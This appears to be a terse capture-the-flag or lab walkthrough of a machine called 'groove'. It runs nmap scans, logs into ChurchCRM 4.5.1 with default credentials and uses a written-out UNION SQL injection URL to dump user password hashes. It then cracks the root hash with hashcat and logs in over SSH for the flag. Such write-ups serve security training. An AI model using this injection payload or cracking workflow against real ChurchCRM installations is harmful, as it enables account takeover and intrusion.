groove

groove

‎$ whoami

Enum

sudo nmap -T4 -A -v -o nmap --min-rate 1000 $IP 
sudo nmap -T4 --script=vuln -v -o vuln --min-rate 1000 $IP
sudo nmap -T4 -A -v -p- -o alltcp --min-rate 1000 $IP
sudo nmap -T4 -sU -sV -sC -v -p -o udp --min-rate 1000 $IP
sudo nmap -A -v -p- -o alltcpslow $IP

Services:

Discovered open port 22/tcp on 192.168.245.44
Discovered open port 80/tcp on 192.168.245.44

80:

image

Default creds work:

Admin:changeme
image
ChurchCRM 4.5.1 - Authenticated SQL Injection php/webapps/51319.py

Before doing this lets see if we can just upload a php shell with our access

Could not find spot, lets try this

➜  groove python3 51319.py http://192.168.245.44 Admin changeme

did not work, but examining the exploit manually we can just utilize URL.

http://192.168.245.44/EventAttendance.php?Action=List&Event=2+UNION+ALL+SELECT+1,NULL,CONCAT(%27Perseverance%27,usr_Username,%27:%27,usr_Password),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL+from+user_usr--+-&Type=Sunday%20School

Dump hashes

Admin:4bdf3fba58c956fc3991a1fde84929223f968e2853de596e49ae80a91499609b 		
root:33b8fc76a24681b67a9431b632548d069336202bed5828fe431711a8e5b52d1b

This github issue:

Embed GitHub

Explains the hashes salt is the user id.

root is id 2

hashcat -m 1410 -a 0 33b8fc76a24681b67a9431b632548d069336202bed5828fe431711a8e5b52d1b:2  /usr/share/wordlists/rockyou.txt
artistakeichelleko2007

ssh in

proof

c0f9e77a0572f4853aae5e64f6c19d51